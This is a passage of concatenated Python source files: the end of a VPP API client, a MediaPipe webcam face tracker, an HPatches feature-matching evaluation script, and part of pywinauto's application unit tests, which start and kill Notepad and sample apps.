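#   print(rv.version)
#   vpp.disconnect()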
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your data structures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
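# A hedged example of the callback contract described above (illustrative,
# not part of the original source):
#
#   def on_event(msg_type_name, msg):
#       # Runs on the background event thread -- keep it quick and guard
#       # shared state with a lock.
#       print(msg_type_name, msg)
#
#   vpp.register_event_callback(on_event)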
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
FaceTracker.py | from threading import Thread
import cv2
import mediapipe as mp
import time
import math
import numpy as np
mp_face_mesh = mp.solutions.face_mesh
#USER MUST UPDATE THE FOLLOWING
camhfov = 80 #camera horizontal field of view, DEGREES
camvfov = 39 #camera vertical field of view, DEGREES
camxres = 1280 #camera x resolution, pixels
camyres = 720 #camera y resolution, pixels
cameraOffset = 4.75 #from center of screen, up is positive, inches. Program assumes camera is centered over or under the screen, with positive value being over.
#cameraOffset = 1.75 #for recording with a camera below the face adjust this
screenWidth = 15.04 #inches
screenHeight = 8.44 #inches
screenResolution = (1920,1080)
userHead = 3400 #user head size; scales only the distance estimate. Adjust this value until distance is correct. There's a print(distance) down there to help with this process, see README file.
scrnW = screenWidth/2
scrnH = screenHeight/2
pixperinch = screenResolution[0] / screenWidth
distance = 45 #arbitrary, quickly overwritten with real values
distance2 = 45
distance3 = 45
starttime = time.time()
frames = 0
tracking = False
def getAngle(a, b, c):
ang = math.degrees(math.atan2(c[1]-b[1], c[0]-b[0]) - math.atan2(a[1]-b[1], a[0]-b[0]))
return ang + 360 if ang < 0 else ang
face_mesh = mp_face_mesh.FaceMesh(static_image_mode=False, max_num_faces=1,
min_detection_confidence=0.4,
min_tracking_confidence=0.4)
class FaceTracker:
def __init__(self, frame=None):
self.frame = frame
self.headxyz = [0, 0, 24, time.time()]
self.stopped = False
#self.tracking = False
def start(self):
Thread(target=self.track, args=()).start()
return self
def track(self):
while not self.stopped:
#cv2.imshow("Video", self.frame)
#if cv2.waitKey(1) == ord("q"):
#self.stopped = True
#print("facetracker worked")
results = face_mesh.process(self.frame)
if results.multi_face_landmarks:
#This is where the user's head location is calculated.
#Mediapipe does not give any sort of value for distance measurement, so we have to figure it out based on how far apart the eyes are.
#Mediapipe outputs landmark locations as normalized coordinates (0 to 1), so we scale them to pixel values where pixel units are needed
eyesh = ( ( (results.multi_face_landmarks[0].landmark[33].x + results.multi_face_landmarks[0].landmark[263].x) / 2) * camhfov - (camhfov/2)) #Calculate the angle from the center of the webcam's FOV to the center of the user's eyes
eyesv = ( ( (results.multi_face_landmarks[0].landmark[33].y + results.multi_face_landmarks[0].landmark[263].y) / 2) * camvfov - (camvfov/2))
shape = self.frame.shape
eyesx = int(( (results.multi_face_landmarks[0].landmark[33].x + results.multi_face_landmarks[0].landmark[263].x) / 2) * shape[1]) #Convert to pixel values for use in drawing tracked location if desired
eyesy = int(( (results.multi_face_landmarks[0].landmark[33].y + results.multi_face_landmarks[0].landmark[263].y) / 2) * shape[0])
nosex = int(results.multi_face_landmarks[0].landmark[4].x * shape[1]) #Get the nose pixel coordinates; this helps when the user turns their head left/right and shrinks the apparent distance between their eyes
nosey = int(results.multi_face_landmarks[0].landmark[4].y * shape[0])
nosetopx = int(results.multi_face_landmarks[0].landmark[6].x * shape[1]) #We're making a line between the top and bottom of the user's nose
nosetopy = int(results.multi_face_landmarks[0].landmark[6].y * shape[0])
nosebottomx = int(results.multi_face_landmarks[0].landmark[164].x * shape[1])
nosebottomy = int(results.multi_face_landmarks[0].landmark[164].y * shape[0])
reyex = int(results.multi_face_landmarks[0].landmark[33].x * shape[1]) #Get x and y coordinates for left and right eyes
reyey = int(results.multi_face_landmarks[0].landmark[33].y * shape[0])
leyex = int(results.multi_face_landmarks[0].landmark[263].x * shape[1])
leyey = int(results.multi_face_landmarks[0].landmark[263].y * shape[0])
eyewidth = math.sqrt((reyex-leyex)**2 + (reyey-leyey)**2) #Calculate pixel distance between left and right eyes
array_longi = np.array([nosetopx-nosebottomx, nosetopy-nosebottomy]) #Line between top and bottom of user's nose
array_trans = np.array([nosetopx-nosex, nosetopy-nosey])
# Use vector to calculate distance from point to line
array_temp = (float(array_trans.dot(array_longi)) / array_longi.dot(array_longi)) #projection coefficient (converted to floating point)
array_temp = array_longi.dot(array_temp) #project onto the nose line to find the foot of the perpendicular
eyenose = eyewidth + np.sqrt((array_trans - array_temp).dot(array_trans - array_temp)) #add the perpendicular distance from the nose tip to the nose line; this offsets the eye width shrinking when the user turns their head left/right
distance = userHead/eyenose #finally convert our pixel values to inches, it's very important userHead is calibrated for distances to be accurate
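#e.g. with the default userHead=3400 and an eyenose measurement of ~100 px, distance = 3400/100 = 34 inches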
#print(distance) #uncomment this to see the distance value in real time, useful for determining userHead value.
headx = (math.tan(math.radians(eyesh)) * distance) #convert angles to user head coordinates
heady = ((math.tan(math.radians(eyesv)) * distance) - cameraOffset)*-1 #invert y value to ensure coords make sense
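#worked example: eyesh = 10 degrees at distance = 24 in gives headx = tan(10 deg) * 24 ≈ 4.2 in off the camera axis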
self.headxyz = [headx, heady, distance, time.time()] #output head xyz coordinates and timestamp
return self.headxyz
#return self.tracking
def stop(self):
self.stopped = True
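# --- Illustrative usage sketch (editor's addition, not part of the original file) ---
# Drives the tracker from a webcam loop. Camera index 0 and the printout are
# assumptions; the constants at the top (FOV, resolution, userHead) must be
# calibrated for your setup.
if __name__ == "__main__":
    cap = cv2.VideoCapture(0)
    ok, frame = cap.read()
    if ok:
        tracker = FaceTracker(frame).start()  # background thread keeps updating headxyz
        try:
            while True:
                ok, frame = cap.read()
                if not ok:
                    break
                tracker.frame = frame  # hand the newest frame to the tracker thread
                x, y, z, t = tracker.headxyz  # inches relative to the screen center
                print("head at x=%.1f y=%.1f z=%.1f" % (x, y, z))
        finally:
            tracker.stop()
            cap.release()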
|
hseq_eval.py | #!/usr/bin/env python3
"""
Copyright 2017, Zixin Luo, HKUST.
Inference script.
"""
import os
from queue import Queue
from threading import Thread
import math
import yaml
import cv2
import numpy as np
import tensorflow as tf
from models import get_model
from utils.hseq_utils import HSeqUtils
from utils.evaluator import Evaluator
FLAGS = tf.compat.v1.app.flags.FLAGS
# general config.
tf.compat.v1.app.flags.DEFINE_string('config', None, """Path to the configuration file.""")
def loader(hseq_utils, producer_queue):
for seq_idx in range(hseq_utils.seq_num):
seq_name, hseq_data = hseq_utils.get_data(seq_idx)
for i in range(6):
gt_homo = [seq_idx, seq_name, hseq_data.scaling] if i == 0 else hseq_data.homo[i]
producer_queue.put([hseq_data.img[i], gt_homo])
producer_queue.put(None)
def extractor(patch_queue, model, consumer_queue):
while True:
queue_data = patch_queue.get()
if queue_data is None:
consumer_queue.put(None)
return
img, gt_homo = queue_data
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
H, W = gray.shape
descs, kpts, _ = model.run_test_data(np.expand_dims(gray, axis=-1))
consumer_queue.put([img, kpts, descs, gt_homo])
patch_queue.task_done()
def matcher(consumer_queue, sess, evaluator, config):
record = []
while True:
queue_data = consumer_queue.get()
if queue_data is None:
return
record.append(queue_data)
if len(record) < 6:
continue
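# a full HPatches sequence has been collected: record[0] is the reference image, record[1:6] are the 5 targets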
ref_img, ref_kpts, ref_descs, seq_info = record[0]
eval_stats = np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32)
seq_idx = seq_info[0]
seq_name = seq_info[1]
scaling = seq_info[2]
print(seq_idx, seq_name)
for i in range(1, 6):
test_img, test_kpts, test_descs, gt_homo = record[i]
# get MMA
num_feat = min(ref_kpts.shape[0], test_kpts.shape[0])
if num_feat > 0:
mma_putative_matches = evaluator.feature_matcher(
sess, ref_descs, test_descs)
else:
mma_putative_matches = []
mma_inlier_matches = evaluator.get_inlier_matches(
ref_kpts, test_kpts, mma_putative_matches, gt_homo, scaling)
num_mma_putative = len(mma_putative_matches)
num_mma_inlier = len(mma_inlier_matches)
# get covisible keypoints
ref_mask, test_mask = evaluator.get_covisible_mask(ref_kpts, test_kpts,
ref_img.shape, test_img.shape,
gt_homo, scaling)
cov_ref_coord, cov_test_coord = ref_kpts[ref_mask], test_kpts[test_mask]
cov_ref_feat, cov_test_feat = ref_descs[ref_mask], test_descs[test_mask]
num_cov_feat = (cov_ref_coord.shape[0] + cov_test_coord.shape[0]) / 2
# get gt matches
gt_num = evaluator.get_gt_matches(cov_ref_coord, cov_test_coord, gt_homo, scaling)
# establish putative matches
if num_cov_feat > 0:
putative_matches = evaluator.feature_matcher(
sess, cov_ref_feat, cov_test_feat)
else:
putative_matches = []
num_putative = max(len(putative_matches), 1)
# get homography accuracy
correctness = evaluator.compute_homography_accuracy(cov_ref_coord, cov_test_coord, ref_img.shape, putative_matches, gt_homo, scaling)
# get inlier matches
inlier_matches = evaluator.get_inlier_matches(
cov_ref_coord, cov_test_coord, putative_matches, gt_homo, scaling)
num_inlier = len(inlier_matches)
eval_stats += np.array((1, # counter
num_feat, # feature number
gt_num / max(num_cov_feat, 1), # repeatability
num_inlier / max(num_putative, 1), # precision
num_inlier / max(num_cov_feat, 1), # matching score
num_inlier / max(gt_num, 1), # recall
num_mma_inlier / max(num_mma_putative, 1), # MMA
correctness)) / 5 # averaged over the 5 image pairs
print(int(eval_stats[1]), eval_stats[2:])
evaluator.stats['all_eval_stats'] += eval_stats
if os.path.basename(seq_name)[0] == 'i':
evaluator.stats['i_eval_stats'] += eval_stats
if os.path.basename(seq_name)[0] == 'v':
evaluator.stats['v_eval_stats'] += eval_stats
record = []
def hseq_eval():
with open(FLAGS.config, 'r') as f:
test_config = yaml.load(f, Loader=yaml.FullLoader)
# Configure dataset
hseq_utils = HSeqUtils(test_config['hseq'])
# Configure evaluation
evaluator = Evaluator(test_config['eval'])
# Construct inference networks.
model = get_model('feat_model')(test_config['model_path'], **(test_config['net']))
# Create the session configuration.
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
producer_queue = Queue(maxsize=18)
consumer_queue = Queue()
producer0 = Thread(target=loader, args=(hseq_utils, producer_queue))
producer0.daemon = True
producer0.start()
producer1 = Thread(target=extractor, args=(producer_queue, model, consumer_queue))
producer1.daemon = True
producer1.start()
consumer = Thread(target=matcher, args=(consumer_queue, model.sess, evaluator, test_config['eval']))
consumer.daemon = True
consumer.start()
producer0.join()
producer1.join()
consumer.join()
evaluator.print_stats('i_eval_stats')
evaluator.print_stats('v_eval_stats')
evaluator.print_stats('all_eval_stats')
if __name__ == '__main__':
tf.compat.v1.flags.mark_flags_as_required(['config'])
hseq_eval()
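# --- Illustrative config sketch (editor's addition, not part of the original file) ---
# The YAML passed via --config must provide at least the keys read in
# hseq_eval() above: 'model_path', 'hseq', 'eval' and 'net'. The inner fields
# of 'hseq', 'eval' and 'net' depend on HSeqUtils, Evaluator and the model
# class, so the ones shown here are placeholders, not the real schema:
#
#     model_path: /path/to/checkpoint   # consumed by get_model('feat_model')
#     hseq:                             # forwarded to HSeqUtils(...)
#       root: /path/to/hpatches-sequences
#     eval: {}                          # forwarded to Evaluator(...)
#     net: {}                           # extra kwargs for the model constructor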
|
test_application.py | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=C0301
#pylint: disable-msg=F0401
#pylint: disable-msg=W0142
"""Tests for application.py"""
import sys
import os
import unittest
import time
#import pprint
#import pdb
import warnings
from threading import Thread
import ctypes
import mock
import six
sys.path.append(".")
from pywinauto import Desktop
from pywinauto.windows import application, win32defines
from pywinauto.controls import hwndwrapper
from pywinauto.windows.application import Application
from pywinauto.base_application import WindowSpecification # noqa: E402
from pywinauto.windows.application import process_module
from pywinauto.windows.application import process_get_modules
from pywinauto.windows.application import ProcessNotFoundError
from pywinauto.windows.application import AppStartError
from pywinauto.windows.application import AppNotConnected
from pywinauto.controls.common_controls import TrackbarWrapper
from pywinauto import findwindows
from pywinauto import findbestmatch
from pywinauto.timings import Timings
from pywinauto.timings import TimeoutError
from pywinauto.timings import WaitUntil
from pywinauto.timings import always_wait_until
from pywinauto.timings import always_wait_until_passes
from pywinauto.timings import timestamp # noqa: E402
from pywinauto.sysinfo import is_x64_Python
from pywinauto.sysinfo import is_x64_OS
from pywinauto.sysinfo import UIA_support
#application.set_timing(1, .01, 1, .01, .05, 0, 0, .1, 0, .01)
# About dialog may take some time to load
# so make sure that we wait for it.
Timings.window_find_timeout = 5
def _notepad_exe():
if is_x64_Python() or not is_x64_OS():
return r"C:\Windows\System32\notepad.exe"
else:
return r"C:\Windows\SysWOW64\notepad.exe"
mfc_samples_folder_32 = mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class ApplicationWarningTestCases(unittest.TestCase):
"""Unit tests for warnings in the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
# Force Display User and Deprecation warnings every time
# Python 3.3 + nose/unittest tries really hard to suppress them
for warning in (UserWarning, PendingDeprecationWarning):
warnings.simplefilter('always', warning)
if is_x64_Python():
self.sample_exe = os.path.join(mfc_samples_folder,
"CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder_32,
"CmnCtrl1.exe")
else:
self.sample_exe = os.path.join(mfc_samples_folder_32, "CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
def testStartWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
app = Application().start(self.sample_exe_inverted_bitness)
app.kill()
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "64-bit" in str(w[-1].message)
def testConnectWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
app = Application().start(self.sample_exe_inverted_bitness)
# AppVeyor mysteries...
self.assertEqual(app.is_process_running(), True)
with mock.patch("warnings.warn") as mockWarn:
Application().connect(pid=app.process)
app.kill()
args, kw = mockWarn.call_args
assert len(args) == 2
assert "64-bit" in args[0]
assert args[1].__name__ == 'UserWarning'
class ApplicationWin32KillTestCases(unittest.TestCase):
"""Unit tests for method Application.kill() with backend='win32'"""
backend = 'win32'
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.sample_exe = os.path.join(mfc_samples_folder, 'RowList.exe')
self.app = Application(backend=self.backend).start(self.sample_exe)
self.target_process = self.app.process
def tearDown(self):
self.app.kill(soft=False)
def test_kill_hard(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
def test_kill_soft(self):
self.assertTrue(self.app.kill(soft=True))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
def test_already_killed_hard(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=False)) # already killed, returned True anyway
def test_already_killed_soft(self):
self.assertTrue(self.app.kill(soft=False))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=True)) # already killed, returned True anyway
def test_kill_soft_with_modal_subdialog(self):
"""Kill the app with modal subdialog to cover win.force_close() call"""
self.app.RowListSampleApplication.menu_select('Help->About RowList...')
if self.backend == 'win32':
self.app.window(name='About RowList').wait('visible')
elif self.backend == 'uia':
self.app.RowListSampleApplication.by(name='About RowList').wait('visible')
else:
raise NotImplementedError('test_kill_soft_with_modal_subdialog: ' \
'backend "{}" is not supported'.format(self.backend))
self.assertTrue(self.app.kill(soft=True))
self.assertRaises(ProcessNotFoundError, Application().connect, pid=self.target_process)
self.assertTrue(self.app.kill(soft=True)) # already killed, returned True anyway
if UIA_support:
class ApplicationUiaKillTestCases(ApplicationWin32KillTestCases):
"""Unit tests for method Application.kill() with backend='uia'"""
backend = 'uia'
# the same test methods run here
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
class AdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(AdminTestCases, self).setUp()
cmd = 'powershell -Command "Start-Process {} -Verb RunAs"'.format(self.sample_exe)
self.app = Application().start(cmd, wait_for_idle=False)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(AdminTestCases, self).tearDown()
def test_non_admin_warning(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(name="Common Controls Sample", timeout=20)
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "process has no rights" in str(w[-1].message)
def test_non_admin_click(self):
self.app = Application().connect(name="Common Controls Sample", timeout=20)
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click_input()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.TVS_HASBUTTON.check()
class NonAdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(NonAdminTestCases, self).setUp()
self.app = Application().start(self.sample_exe)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(NonAdminTestCases, self).tearDown()
def test_both_non_admin(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(name="Common Controls Sample", timeout=5)
assert len(w) == 0
def test_both_non_admin_click(self):
self.app = Application().connect(name="Common Controls Sample", timeout=5)
self.app.CommonControlsSample.TVS_HASBUTTON.check()
self.assertEqual(self.app.CommonControlsSample.TVS_HASBUTTON.is_checked(), True)
self.app.CommonControlsSample.OK.click()
self.app.CommonControlsSample.wait_not('visible')
class ApplicationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.prev_warn = warnings.showwarning
def no_warnings(*args, **kwargs): pass
warnings.showwarning = no_warnings
if is_x64_Python() or not is_x64_OS():
self.notepad_subpath = r"system32\notepad.exe"
else:
self.notepad_subpath = r"SysWOW64\notepad.exe"
def tearDown(self):
"""Close the application after tests"""
#self.dlg.SendMessage(win32defines.WM_CLOSE)
warnings.showwarning = self.prev_warn
def test__init__(self):
"""Verify that Application instance is initialized or not"""
self.assertRaises(ValueError, Application, backend='unregistered')
def test__iter__(self):
"""Verify that Application instance is not iterable"""
app = Application()
app.start(_notepad_exe())
with self.assertRaises(NotImplementedError):
for a in app:
pass
app.kill()
def test_not_connected(self):
"""Verify that it raises when the app is not connected"""
self.assertRaises(AppNotConnected, Application().__getattribute__, 'Hiya')
self.assertRaises(AppNotConnected, Application().__getitem__, 'Hiya')
self.assertRaises(AppNotConnected, Application().window_, name='Hiya')
self.assertRaises(AppNotConnected, Application().top_window_)
def test_start_problem(self):
"""Verify start_ raises on unknown command"""
self.assertRaises(AppStartError, Application().start, 'Hiya')
def test_start(self):
"""test start() works correctly"""
app = Application()
self.assertEqual(app.process, None)
app.start(_notepad_exe())
self.assertNotEqual(app.process, None)
self.assertEqual(app.UntitledNotepad.process_id(), app.process)
notepadpath = os.path.join(os.environ['systemroot'], self.notepad_subpath)
self.assertEqual(str(process_module(app.process)).lower(), str(notepadpath).lower())
app.UntitledNotepad.menu_select("File->Exit")
def testStart_bug01(self):
"""On SourceForge forum AppStartError forgot to include %s for application name"""
app = Application()
self.assertEqual(app.process, None)
application.app_start_timeout = 1
app_name = r"I am not * and Application!/\.exe"
try:
app.start(app_name)
except AppStartError as e:
self.assertEqual(app_name in str(e), True)
# def testset_timing(self):
# """Test that set_timing sets the timing correctly"""
# prev_timing = (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# )
# set_timing(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
#
# self.assertEqual(
# (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# ), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10) )
#
# set_timing(*prev_timing)
def test_connect_path(self):
"""Test that connect_() works with a path"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(path=self.notepad_subpath)
self.assertEqual(app1.process, app_conn.process)
app_conn = Application()
if is_x64_Python() or not is_x64_OS():
app_conn.connect(path=r"c:\windows\system32\notepad.exe")
else:
app_conn.connect(path=r"c:\windows\syswow64\notepad.exe")
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEqual('notepad.exe' in accessible_process_names, True)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_path_timeout(self):
"""Test that connect_() works with a path with timeout"""
app1 = Application()
def delayed_launch():
time.sleep(2)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
app_conn = Application()
app_conn.connect(path=_notepad_exe(), timeout=3)
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEqual('notepad.exe' in accessible_process_names, True)
app1.UntitledNotepad.menu_select('File->Exit')
def test_connect_path_timeout_problem(self):
"""Test that connect_() raise error when no process start"""
app1 = Application()
def delayed_launch():
time.sleep(1)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
self.assertRaises(ProcessNotFoundError, Application().connect, path=_notepad_exe(), timeout=0.5)
time.sleep(0.7)
app1.UntitledNotepad.menu_select('File->Exit')
def test_connect_process_timeout_failed(self):
"""Test that connect_(pid=...) raise error when set timeout"""
app1 = Application()
app1.start(_notepad_exe())
self.assertRaises(ProcessNotFoundError, Application().connect, pid=0, timeout=0.5)
app1.UntitledNotepad.menu_select('File->Exit')
# def test_Connect(self):
# """Test that connect_() works with a path"""
# app1 = Application()
# app1.start_("notepad.exe")
#
# app_conn = Application()
# app_conn.connect_(path = r"system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn = Application()
# app_conn.connect_(path = r"c:\windows\system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_process(self):
"""Test that connect_() works with a process"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(pid=app1.process)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_handle(self):
"""Test that connect_() works with a handle"""
app1 = Application()
app1.start(_notepad_exe())
handle = app1.UntitledNotepad.handle
app_conn = Application()
app_conn.connect(handle=handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_windowspec(self):
"""Test that connect_() works with a windowspec"""
app1 = Application()
app1.start(_notepad_exe())
#unused var: handle = app1.UntitledNotepad.handle
app_conn = Application()
try:
app_conn.connect(name="Untitled - Notepad")
except findwindows.WindowAmbiguousError:
wins = findwindows.find_elements(active_only=True, name="Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
except findwindows.ElementNotFoundError:
WaitUntil(30, 0.5, lambda: len(findwindows.find_elements(active_only=True, name="Untitled - Notepad")) > 0)
wins = findwindows.find_elements(active_only=True, name="Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.menu_select('File->Exit')
def test_connect_raises(self):
"""Test that connect_() raises with invalid input"""
# try an argument that does not exist
self.assertRaises(
KeyError,
Application().connect, **{'not_arg': 23})
self.assertRaises(
RuntimeError,
Application().connect)
# try to pass an invalid process
self.assertRaises(
ProcessNotFoundError,
Application().connect, **{'pid': 0})
# try to pass an invalid handle
self.assertRaises(
RuntimeError,
Application().connect, **{'handle' : 0})
# try to pass an invalid path
self.assertRaises(
ProcessNotFoundError,
Application().connect, **{'path': "no app here", 'timeout': 0.0})
def test_top_window(self):
"""Test that top_window_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.top_window_)
app.start(_notepad_exe())
self.assertEqual(app.UntitledNotepad.handle, app.top_window_().handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
self.assertEqual(app.AboutNotepad.handle, app.top_window_().handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
self.assertRaises(RuntimeError, app.top_window_)
def test_active_window(self):
"""Test that active_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.active_)
self.assertRaises(AppNotConnected, app.is64bit)
app.start(_notepad_exe())
app.UntitledNotepad.wait('ready')
self.assertEqual(app.active_().handle, app.UntitledNotepad.handle)
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
self.assertRaises(RuntimeError, app.active_)
def test_cpu_usage(self):
"""Verify that cpu_usage() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.cpu_usage)
app.start(_notepad_exe())
self.assertEqual(0.0 <= app.cpu_usage() <= 100.0, True)
app.UntitledNotepad.menu_select("File->Exit")
app.UntitledNotepad.wait_not('exists')
def test_wait_cpu_usage_lower(self):
"""Test that wait_cpu_usage_lower() works correctly"""
if is_x64_Python() != is_x64_OS():
return None
Application().Start(r'explorer.exe')
def _cabinetwclass_exist():
"Verify if at least one active 'CabinetWClass' window is created"
l = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')
return (len(l) > 0)
WaitUntil(40, 0.5, _cabinetwclass_exist)
handle = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')[-1].handle
window = WindowSpecification({'handle': handle, 'backend': 'win32', })
explorer = Application().Connect(pid = window.process_id())
try:
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
window.AddressBandRoot.ClickInput()
window.TypeKeys(r'Control Panel\Programs\Programs and Features', with_spaces=True, set_foreground=True)
window.TypeKeys(r'{ENTER}', set_foreground = False)
WaitUntil(40, 0.5, lambda: len(findwindows.find_elements(active_only=True,
name='Programs and Features',
class_name='CabinetWClass')) > 0)
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
